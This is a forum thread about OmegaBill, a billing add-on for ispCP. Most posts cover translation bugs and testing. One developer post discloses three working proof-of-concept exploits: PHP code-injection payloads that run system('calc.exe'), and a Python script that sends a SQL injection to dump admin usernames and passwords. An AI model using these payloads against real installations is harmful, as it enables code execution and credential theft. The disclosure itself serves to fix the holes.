+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega Contributions Area (/forum-40.html)
+--- Forum: Enhancements (/forum-43.html)
+--- Thread: [DEV] OmegaBill (/thread-6793.html)
RE: [DEV] OmegaBill - platix - 03-18-2011 09:51 PM
Hello all!!!
Here are my contribution.
Spanish translation
I Found some bugs in translations,
PHP Code:
login.php
32: <legend>LOGIN:</legend> ; No translated
37: <td width="30%">Username:</td>;----><?php echo $aedm['Username'];?>
45: <td>Password:</td>;----><?php echo $aedm['Password'];?>
56: <td><input name="button" id="button" value="Submit" type="submit"></td>; No translated
index.php
154 to 160: "per page" no translated
paid or unpaid states
settings.php
308:"portrait" no translated
309:"landscape" no translated
"Search" on all pages no translated
"Print this page" on all pages no translated
"Sumit" buttons on all pages no translated
Good work and thanks for the system
regards!
RE: [DEV] OmegaBill - max.samael - 03-18-2011 11:59 PM
Slovak translation 100%
I add new line:
//coding
$general['charset']='UTF-8';
Coding for head
RE: [DEV] OmegaBill - max.samael - 03-19-2011 03:17 AM
Can I participate with ISPvoice system?
RE: [DEV] OmegaBill - shaggy - 03-27-2011 09:07 AM
Hey oddyutza,
How is it all going, have you managed to finish it yet? I really would like to drop my invoicing program and have it all working in one system. need help with bug testing? post me a link to your current version and I will test it.
RE: [DEV] OmegaBill - oddyutza - 04-16-2011 02:56 AM
hello all,
it seems that OmegaBill has some security problems
All Tested On...............Windows Vista + XAMPP
Vulnerability 1:
http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?>
NOTE: client panel is not ready
Vulnerability 2:
POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
Host: localhost
Connection: keep-alive
User-Agent: x
Content-Length: 93
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name="html"
<?php system("calc.exe"); ?>
------x--
Vulnerability 3:
import socket
host = 'localhost'
path = '/omegabill_v1.0_build6'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/generate_report.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 239\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="startdate"\r\n'
'\r\n'
'\'OR 1 = 1 UNION ALL SELECT CONCAT(username,\':\',password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM admins;#\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="enddate"\r\n'
'\r\n'
'\r\n'
'------x--\r\n'
'\r\n')
print s.recv(8192)
# An authentication bypass/SQL injection vulnerability in OmegaBill v1.0
# Build 6 can be exploited to retreive a list of usernames and passwords.
i will make some changes to the code ASAP
also
there are planned some bigger updates with the new release
@ shaggy : can u please test if the holes are replicated to Unix OS ?
RE: [DEV] OmegaBill - shaggy - 04-18-2011 12:00 AM
I have just got my server back online after a major network change, and the server then deciding it didn't want to work with me, so I am now using Debian, I haven't got Omega bill installed as yet but I will look into it, I am corrently setting up a testing server so I can test things BEFORE putting it on my production server as I think that was one of my downfalls. will post back when it's running
RE: [DEV] OmegaBill - anarking - 06-15-2011 02:56 AM
Hi guys, any movement with this? I can setup a clean ispCP install on a virtual machine with a dedicated IP and load OmegaBill, even give you guys SSH access if you'd like so testing can be done anytime. Let me know, I would love nothing more than for some ordering/billing system to be complete!
RE: [DEV] OmegaBill - max.samael - 07-08-2011 05:38 AM
Hello, any idea with merging ispvoice 1.20 project and omegabill?
I will prepare plugin, that can work with omegabill.
If someone is interested, please, contact me.